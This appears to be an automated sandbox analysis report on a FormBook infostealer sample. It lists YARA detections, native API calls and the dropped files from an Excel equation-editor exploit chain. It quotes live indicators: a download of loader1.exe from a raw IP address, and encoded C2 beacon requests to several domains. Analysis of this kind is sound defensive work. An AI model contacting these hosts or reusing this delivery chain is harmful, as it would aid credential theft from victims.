Source: explorer.exe, 0000000A.00000000.483971283.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AA6CA394.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.garimpeirastore.online
Source: global traffic HTTP traffic detected: GET /files/loader1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.173.219.122Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=X9Az7RtkaU81d6o9S6tJRjQeFUHqBPh6fbjII6Bm04v0rRN3gQJahLAd3CrM9JEnxgRa3A==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.ecofingers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=OTag2QWxPYUT5Vjr08k9uySlAuCzwAh9yU7TJs1orjitWjs6OQC6P28HkD9bWaqSe7I0Ww==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.onedadtwodudes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=Y4JBfBjEKLG3bE/nPu+ARLK4ZQab+dap1kyoobOuuyzzJOKZWwpYr6zx24KPHwTC7q0HDg==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.doityourselfism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /dy8g/?illD=dI9eO6GBnSulhV6EbBGZI9CJMc/scmM0Fshd6X+e3vq0VlxBF2NWOUbA55lfRDBFVPtqQQ==&7nh=0br0WzXxgHiLa HTTP/1.1Host: www.matcitekids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe Jump to dropped file
Yara signature match
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.480756395.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521464934.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521514431.00000000002B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691920173.00000000002D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.503236958.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.512918777.0000000009554000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691808432.00000000000E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.691877071.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.521543777.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E43005 6_2_00E43005
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E490B2 6_2_00E490B2
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E4A891 6_2_00E4A891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E4B85D 6_2_00E4B85D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E49624 6_2_00E49624
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E4799C 6_2_00E4799C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00E48B40 6_2_00E48B40
Source: C:\Users\Public\vbc.exe Code function: 8_2_0040102E 8_2_0040102E
Source: C:\Users\Public\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B8FB 8_2_0041B8FB
Source: C:\Users\Public\vbc.exe Code function: 8_2_00408C6C 8_2_00408C6C
Source: C:\Users\Public\vbc.exe Code function: 8_2_00408C70 8_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B57A 8_2_0041B57A
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402D88 8_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041C58A 8_2_0041C58A
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E490B2 8_2_00E490B2
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E4A891 8_2_00E4A891
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E4B85D 8_2_00E4B85D
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E43005 8_2_00E43005
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E4799C 8_2_00E4799C
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E48B40 8_2_00E48B40
Source: C:\Users\Public\vbc.exe Code function: 8_2_00E49624 8_2_00E49624
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093E0C6 8_2_0093E0C6
Source: C:\Users\Public\vbc.exe Code function: 8_2_0096D005 8_2_0096D005
Source: C:\Users\Public\vbc.exe Code function: 8_2_0095905A 8_2_0095905A
Source: C:\Users\Public\vbc.exe Code function: 8_2_00943040 8_2_00943040
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093E2E9 8_2_0093E2E9
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E1238 8_2_009E1238
Source: C:\Users\Public\vbc.exe Code function: 8_2_009663DB 8_2_009663DB
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093F3CF 8_2_0093F3CF
Source: C:\Users\Public\vbc.exe Code function: 8_2_00942305 8_2_00942305
Source: C:\Users\Public\vbc.exe Code function: 8_2_00947353 8_2_00947353
Source: C:\Users\Public\vbc.exe Code function: 8_2_0098A37B 8_2_0098A37B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00975485 8_2_00975485
Source: C:\Users\Public\vbc.exe Code function: 8_2_00951489 8_2_00951489
Source: C:\Users\Public\vbc.exe Code function: 8_2_0097D47D 8_2_0097D47D
Source: C:\Users\Public\vbc.exe Code function: 8_2_0095C5F0 8_2_0095C5F0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094351F 8_2_0094351F
Source: C:\Users\Public\vbc.exe Code function: 8_2_00944680 8_2_00944680
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094E6C1 8_2_0094E6C1
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E2622 8_2_009E2622
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C579A 8_2_009C579A
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094C7BC 8_2_0094C7BC
Source: C:\Users\Public\vbc.exe Code function: 8_2_009757C3 8_2_009757C3
Source: C:\Users\Public\vbc.exe Code function: 8_2_009DF8EE 8_2_009DF8EE
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094C85C 8_2_0094C85C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0096286D 8_2_0096286D
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E098E 8_2_009E098E
Source: C:\Users\Public\vbc.exe Code function: 8_2_009429B2 8_2_009429B2
Source: C:\Users\Public\vbc.exe Code function: 8_2_009569FE 8_2_009569FE
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C5955 8_2_009C5955
Source: C:\Users\Public\vbc.exe Code function: 8_2_009F3A83 8_2_009F3A83
Source: C:\Users\Public\vbc.exe Code function: 8_2_009ECBA4 8_2_009ECBA4
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093FBD7 8_2_0093FBD7
Source: C:\Users\Public\vbc.exe Code function: 8_2_009CDBDA 8_2_009CDBDA
Source: C:\Users\Public\vbc.exe Code function: 8_2_00967B00 8_2_00967B00
Source: C:\Users\Public\vbc.exe Code function: 8_2_009DFDDD 8_2_009DFDDD
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBE0C6 11_2_00BBE0C6
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BED005 11_2_00BED005
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BD905A 11_2_00BD905A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC3040 11_2_00BC3040
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBE2E9 11_2_00BBE2E9
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C61238 11_2_00C61238
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BE63DB 11_2_00BE63DB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBF3CF 11_2_00BBF3CF
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC2305 11_2_00BC2305
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C0A37B 11_2_00C0A37B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC7353 11_2_00BC7353
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BD1489 11_2_00BD1489
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BF5485 11_2_00BF5485
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BDC5F0 11_2_00BDC5F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC351F 11_2_00BC351F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC4680 11_2_00BC4680
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BCE6C1 11_2_00BCE6C1
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C62622 11_2_00C62622
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BCC7BC 11_2_00BCC7BC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C4579A 11_2_00C4579A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BF57C3 11_2_00BF57C3
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C5F8EE 11_2_00C5F8EE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BE286D 11_2_00BE286D
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BCC85C 11_2_00BCC85C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BC29B2 11_2_00BC29B2
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BD69FE 11_2_00BD69FE
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C6098E 11_2_00C6098E
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C45955 11_2_00C45955
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C73A83 11_2_00C73A83
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C4DBDA 11_2_00C4DBDA
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C6CBA4 11_2_00C6CBA4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BBFBD7 11_2_00BBFBD7
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BE7B00 11_2_00BE7B00
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00C5FDDD 11_2_00C5FDDD
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BF0D3B 11_2_00BF0D3B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BCCD5B 11_2_00BCCD5B
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BF2E2F 11_2_00BF2E2F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BDEE4C 11_2_00BDEE4C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BD0F3F 11_2_00BD0F3F
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BEDF7C 11_2_00BEDF7C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB57A 11_2_000FB57A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FC58A 11_2_000FC58A
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000FB8FB 11_2_000FB8FB
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E8C6C 11_2_000E8C6C
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E8C70 11_2_000E8C70
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E2D88 11_2_000E2D88
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E2D90 11_2_000E2D90
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_000E2FB0 11_2_000E2FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0093DF5C appears 91 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E442E2 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00E43B80 appears 42 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0098373B appears 204 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009AF970 appears 76 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00983F92 appears 94 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093E2A8 appears 34 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C2F970 appears 81 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00BBDF5C appears 105 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00BBE2A8 appears 38 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C0373B appears 238 times
Source: C:\Windows\SysWOW64\wuapp.exe Code function: String function: 00C03F92 appears 108 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 8_2_004181D0 NtCreateFile, 8_2_004181D0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418280 NtReadFile, 8_2_00418280
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418300 NtClose, 8_2_00418300
Source: C:\Users\Public\vbc.exe Code function: 8_2_004183B0 NtAllocateVirtualMemory, 8_2_004183B0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00418222 NtCreateFile, 8_2_00418222
Source: C:\Users\Public\vbc.exe Code function: 8_2_004183AA NtAllocateVirtualMemory, 8_2_004183AA
Source: C:\Users\Public\vbc.exe Code function: 8_2_009300C4 NtCreateFile,LdrInitializeThunk, 8_2_009300C4
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_00930048
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930078 NtResumeThread,LdrInitializeThunk, 8_2_00930078
Source: C:\Users\Public\vbc.exe Code function: 8_2_009307AC NtCreateMutant,LdrInitializeThunk, 8_2_009307AC
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F9F0 NtClose,LdrInitializeThunk, 8_2_0092F9F0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F900 NtReadFile,LdrInitializeThunk, 8_2_0092F900
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_0092FAD0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0092FAE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0092FBB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0092FB68
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_0092FC90
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0092FC60
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0092FD8C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0092FDC0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_0092FEA0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0092FED0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0092FFB4
Source: C:\Users\Public\vbc.exe Code function: 8_2_009310D0 NtOpenProcessToken, 8_2_009310D0
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930060 NtQuerySection, 8_2_00930060
Source: C:\Users\Public\vbc.exe Code function: 8_2_009301D4 NtSetValueKey, 8_2_009301D4
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093010C NtOpenDirectoryObject, 8_2_0093010C
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931148 NtOpenThread, 8_2_00931148
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F8CC NtWaitForSingleObject, 8_2_0092F8CC
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931930 NtSetContextThread, 8_2_00931930
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092F938 NtWriteFile, 8_2_0092F938
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FAB8 NtQueryValueKey, 8_2_0092FAB8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA20 NtQueryInformationFile, 8_2_0092FA20
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FA50 NtEnumerateValueKey, 8_2_0092FA50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FBE8 NtQueryVirtualMemory, 8_2_0092FBE8
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FB50 NtCreateKey, 8_2_0092FB50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC30 NtOpenProcess, 8_2_0092FC30
Source: C:\Users\Public\vbc.exe Code function: 8_2_00930C40 NtGetContextThread, 8_2_00930C40
Source: C:\Users\Public\vbc.exe Code function: 8_2_0092FC48 NtSetInformationFile, 8_2_0092FC48
Source: C:\Users\Public\vbc.exe Code function: 8_2_00931D80 NtSuspendThread, 8_2_00931D80
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB00C4 NtCreateFile,LdrInitializeThunk, 11_2_00BB00C4
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BB07AC NtCreateMutant,LdrInitializeThunk, 11_2_00BB07AC
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF9F0 NtClose,LdrInitializeThunk, 11_2_00BAF9F0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAF900 NtReadFile,LdrInitializeThunk, 11_2_00BAF900
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAB8 NtQueryValueKey,LdrInitializeThunk, 11_2_00BAFAB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 11_2_00BAFAE8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 11_2_00BAFAD0
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFBB8 NtQueryInformationToken,LdrInitializeThunk, 11_2_00BAFBB8
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_00BAFB68
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFB50 NtCreateKey,LdrInitializeThunk, 11_2_00BAFB50
Source: C:\Windows\SysWOW64\wuapp.exe Code function: 11_2_00BAFC60 NtMapViewOfSection,LdrInitializeThunk, 11_2_00BAFC60
